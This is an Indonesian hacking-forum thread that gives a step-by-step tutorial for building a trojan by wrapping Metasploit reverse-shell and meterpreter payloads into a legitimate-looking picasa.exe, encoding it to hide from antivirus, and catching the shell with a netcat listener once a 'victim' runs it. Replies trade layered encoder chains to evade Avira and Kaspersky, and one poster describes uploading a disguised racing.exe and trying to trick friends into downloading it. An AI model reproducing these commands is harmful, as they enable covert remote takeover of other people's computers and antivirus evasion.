[amanojaku]

permisi mi2n,mo2d dan kawan2 IBT semua,ijin bikin thread ye ,
btw ni thread pertama ane ,, sebelumnya sory kalo rada acak2an .

sesuai judul ,kali ini kita akan coba membuat trojan yang akan kita encode dengan menggunakan msfencode di metasploit :d,tujuanya agar file trojan yang kita bikin tersamarkan dan tidak mudah terdeksi sama antivirus maupun korban, =))

here we go ... \m/
pertama2 bahan yang kita butuhkan adalah :
1.metasploit (sudah include di backtrack)
2.msfpayload (include di metasploit )
3.msfencode (include di metasploit )
4.file .exe yang akan kita gunakan untuk "membungkus" trojan yang kita buat (yang saya gunakan picasa.exe)

langkah pertama :
buka terminal,masuk ke direktory metasploit

Code:

ketik cd /opt/metasploit/msf3

Spoiler! :

kedua :
bikin payload dengan menggunakan msfpayload kemudian encode menggunakan msfencode,

Code:

root@bt:/opt/metasploit/msf3# ./msfpayload windows/shell_reverse_tcp LHOST=192.168.59.2 LPORT=4444 R | ./msfencode -a x86 -e x86/shikata_ga_nai -t exe -x /root/picasa.exe > /root/Desktop/picasa.exe

ket:
- payl0ad yang saya pake windows/shell_reverse_tcp
- LHOST : ip saya
- LPORT : port listener saya
- encoding menggunakan ./msfencode
- dengan arsitektur (-a) x86 (32bit)
- menggunakan encoder (-e) x86/shikata_ga_nai
- hasil output (-t) exe
- hasil output saya simpan di Desktop dengan nama picasa.exe (> /root/Desktop /picasa.exe)

dan enter,tunggu proses,setelah jadi akan tampak seperti gambar berikut

Spoiler! :

kemudian cari file .exe yang kita buat tadi,terus copy kan ke komputer korban

sebelumnya kita aktifkan dulu mode listener di terminal dengan netcat

Code:

nc -l -v -p 4444

dan lihat apa yang terjadi ketika file ini dieksekusi,

Spoiler! :

taraaaaa ,kita berhasil masuk shell korban

*tambahan
untuk melihat opsi pada msfencode dapat menggunakan perintah ./msfencode -h

Code:

root@bt:/opt/metasploit/msf3# ./msfencode -h

    Usage: ./msfencode <options>

OPTIONS:

    -a <opt>  The architecture to encode as
    -b <opt>  The list of characters to avoid: '\x00\xff'
    -c <opt>  The number of times to encode the data
    -d <opt>  Specify the directory in which to look for EXE templates
    -e <opt>  The encoder to use
    -h        Help banner
    -i <opt>  Encode the contents of the supplied file path
    -k        Keep template working; run payload in new thread (use with -x)
    -l        List available encoders
    -m <opt>  Specifies an additional module search path
    -n        Dump encoder information
    -o <opt>  The output file
    -p <opt>  The platform to encode for
    -s <opt>  The maximum size of the encoded data
    -t <opt>  The output format: raw,ruby,rb,perl,pl,bash,sh,c,js_be,js_le,java,dll,exe,exe-small,elf,macho,vba,vba-exe,vbs,loop-vbs,asp,aspx,war,psh,psh-net
    -v        Increase verbosity
    -x <opt>  Specify an alternate executable template

dan untuk melihat list yang ada pada msfencode dapat menggunakan perintah ./msfencode -l

Code:

root@bt:/opt/metasploit/msf3# ./msfencode -l

Framework Encoders
==================

    Name                          Rank       Description
    ----                          ----       -----------
    cmd/generic_sh                good       Generic Shell Variable Substitution Command Encoder
    cmd/ifs                       low        Generic ${IFS} Substitution Command Encoder
    cmd/printf_php_mq             manual     printf(1) via PHP magic_quotes Utility Command Encoder
    generic/none                  normal     The "none" Encoder
    mipsbe/longxor                normal     XOR Encoder
    mipsle/longxor                normal     XOR Encoder
    php/base64                    great      PHP Base64 Encoder
    ppc/longxor                   normal     PPC LongXOR Encoder
    ppc/longxor_tag               normal     PPC LongXOR Encoder
    sparc/longxor_tag             normal     SPARC DWORD XOR Encoder
    x64/xor                       normal     XOR Encoder
    x86/alpha_mixed               low        Alpha2 Alphanumeric Mixedcase Encoder
    x86/alpha_upper               low        Alpha2 Alphanumeric Uppercase Encoder
    x86/avoid_underscore_tolower  manual     Avoid underscore/tolower
    x86/avoid_utf8_tolower        manual     Avoid UTF8/tolower
    x86/call4_dword_xor           normal     Call+4 Dword XOR Encoder
    x86/context_cpuid             manual     CPUID-based Context Keyed Payload Encoder
    x86/context_stat              manual     stat(2)-based Context Keyed Payload Encoder
    x86/context_time              manual     time(2)-based Context Keyed Payload Encoder
    x86/countdown                 normal     Single-byte XOR Countdown Encoder
    x86/fnstenv_mov               normal     Variable-length Fnstenv/mov Dword XOR Encoder
    x86/jmp_call_additive         normal     Jump/Call XOR Additive Feedback Encoder
    x86/nonalpha                  low        Non-Alpha Encoder
    x86/nonupper                  low        Non-Upper Encoder
    x86/shikata_ga_nai            excellent  Polymorphic XOR Additive Feedback Encoder
    x86/single_static_bit         manual     Single Static Bit
    x86/unicode_mixed             manual     Alpha2 Alphanumeric Unicode Mixedcase Encoder
    x86/unicode_upper             manual     Alpha2 Alphanumeric Unicode Uppercase Encoder

sekian,
semoga bermanfaat

[iKONspirasi]

thx udah share disini bro

[ardian]

itu masih kedetec antivirus ga ?

---

aku dah coba bikin, sampe aku ubah hexa nya tetep kedetek soalnya
. itu antivirus ya bropake apa kok bisa ga kedetec ??

[amanojaku]

thx udah share disini bro

sama2 om

itu masih kedetec antivirus ga ?

---

aku dah coba bikin, sampe aku ubah hexa nya tetep kedetek soalnya
. itu antivirus ya bropake apa kok bisa ga kedetec ??

coba encodernya di lapis2 bro ,,

contoh:

Code:

root@bt:/opt/metasploit/msf3# ./msfpayload windows/shell_reverse_tcp LHOST=192.168.59.2 LPORT=4444 R | ./msfencode -a x86 -e x86/shikata_ga_nai -c 4 -b -t raw | ./msfencode -a x86 -e x86/jmp_call_additive -c 4 -t raw | ./msfencode -a x86 -c 4 -t exe -x /root/picasa.exe > /root/Desktop/picasa.exe

^ moga aja bener
btw ane ngecek nya pake virustotal om ..
,

[2s4u4b3h4an]

wahh ini yang di tunggu2
good share om

[amanojaku]

wahh ini yang di tunggu2
good share om

sip,
di coba om ....

[ardian]

ane pake avira ama kaspersky bos,, tapi tetep aja kedetec,,hhe,,

[xsan-lahci]

ane pake avira ama kaspersky bos,, tapi tetep aja kedetec,,hhe,,

coba gunakan cara ini

xsan@ibt:~# msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=4444 R | msfencode -a x86 -b '\x00\xff' -e x86/shikata_ga_nai -c 8 -v -t raw | msfencode -e x86/call4_dword_xor -c 2 -t raw | msfencode -e x86/jmp_call_additive -c 2 -t exe > /tmp/picasa.exe

keterangan :
1. Membuka sesi meterpreter.
2. Membuat korban berinteraksi dengan metasploit yang berdiam pada IP address 10.160.37.199 dan mendengarkan pada port 4444
3. File disimpan dalam bentuk RAW (masih mentah, hanya berbentuk text)
4. msfencode melakukan encoding payload dengan arsitektur x86 (32 bit)
5. msfencode melakukan encoding payload dengan menghindari shell code \x00\xff saat melakukan generating shell code.
6. msfencode melakukan encoding payload dengan x86/shikata_ga_nai
7. x86/shikata_ga_nai melakukan encoding payload sebanyak 8 kali
8. msfencode meingkatkan verbose level
9. msfencode menyimpan payload dalam format RAW
10. msfencode melakukan encoding kembali dengan encoder x86/call4_dword_xor
11. x86/call4_dword_xor melakukan encoding sebanyak 2 kali
12 x86/call4_dword_xor menyimpan payload dalam format RAW
13. msfencode melakukan encoding dengan encoder x86/jmp_call_additive
14. x86/jmp_call_additive melakukan encoding payload sebanyak 2 kali
15. msfencode melakukan encoding dengan format ektensi .exe
16. File di beri nama Picasa.exe pada direktori /tmp/

Thanks t0 : red-dragon

setau ane kaspersky emng paling good masbro rada sulit..

[amanojaku]

ane pake avira ama kaspersky bos,, tapi tetep aja kedetec,,hhe,,

coba gunakan cara ini

xsan@ibt:~# msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=4444 R | msfencode -a x86 -b '\x00\xff' -e x86/shikata_ga_nai -c 8 -v -t raw | msfencode -e x86/call4_dword_xor -c 2 -t raw | msfencode -e x86/jmp_call_additive -c 2 -t exe > /tmp/picasa.exe

keterangan :
1. Membuka sesi meterpreter.
2. Membuat korban berinteraksi dengan metasploit yang berdiam pada IP address 10.160.37.199 dan mendengarkan pada port 4444
3. File disimpan dalam bentuk RAW (masih mentah, hanya berbentuk text)
4. msfencode melakukan encoding payload dengan arsitektur x86 (32 bit)
5. msfencode melakukan encoding payload dengan menghindari shell code \x00\xff saat melakukan generating shell code.
6. msfencode melakukan encoding payload dengan x86/shikata_ga_nai
7. x86/shikata_ga_nai melakukan encoding payload sebanyak 8 kali
8. msfencode meingkatkan verbose level
9. msfencode menyimpan payload dalam format RAW
10. msfencode melakukan encoding kembali dengan encoder x86/call4_dword_xor
11. x86/call4_dword_xor melakukan encoding sebanyak 2 kali
12 x86/call4_dword_xor menyimpan payload dalam format RAW
13. msfencode melakukan encoding dengan encoder x86/jmp_call_additive
14. x86/jmp_call_additive melakukan encoding payload sebanyak 2 kali
15. msfencode melakukan encoding dengan format ektensi .exe
16. File di beri nama Picasa.exe pada direktori /tmp/

Thanks t0 : red-dragon

setau ane kaspersky emng paling good masbro rada sulit..

iya ternyata,,,setelah ane coba pake kaspersky lngsung ke detect virus

[aristateles$]

ane pake avira ama kaspersky bos,, tapi tetep aja kedetec,,hhe,,

coba gunakan cara ini

xsan@ibt:~# msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=4444 R | msfencode -a x86 -b '\x00\xff' -e x86/shikata_ga_nai -c 8 -v -t raw | msfencode -e x86/call4_dword_xor -c 2 -t raw | msfencode -e x86/jmp_call_additive -c 2 -t exe > /tmp/picasa.exe

keterangan :
1. Membuka sesi meterpreter.
2. Membuat korban berinteraksi dengan metasploit yang berdiam pada IP address 10.160.37.199 dan mendengarkan pada port 4444
3. File disimpan dalam bentuk RAW (masih mentah, hanya berbentuk text)
4. msfencode melakukan encoding payload dengan arsitektur x86 (32 bit)
5. msfencode melakukan encoding payload dengan menghindari shell code \x00\xff saat melakukan generating shell code.
6. msfencode melakukan encoding payload dengan x86/shikata_ga_nai
7. x86/shikata_ga_nai melakukan encoding payload sebanyak 8 kali
8. msfencode meingkatkan verbose level
9. msfencode menyimpan payload dalam format RAW
10. msfencode melakukan encoding kembali dengan encoder x86/call4_dword_xor
11. x86/call4_dword_xor melakukan encoding sebanyak 2 kali
12 x86/call4_dword_xor menyimpan payload dalam format RAW
13. msfencode melakukan encoding dengan encoder x86/jmp_call_additive
14. x86/jmp_call_additive melakukan encoding payload sebanyak 2 kali
15. msfencode melakukan encoding dengan format ektensi .exe
16. File di beri nama Picasa.exe pada direktori /tmp/

Thanks t0 : red-dragon

setau ane kaspersky emng paling good masbro rada sulit..

iya ternyata,,,setelah ane coba pake kaspersky lngsung ke detect virus

ane nyoba upload ke 4shred.com
Terus ane hasut temen ane buat download, ga ada yang berani. Nama file-nya padahal udah racing.exe ,soalnya ke detect virus sama McAfee.
Ada cara biar ga ke detect ga ?.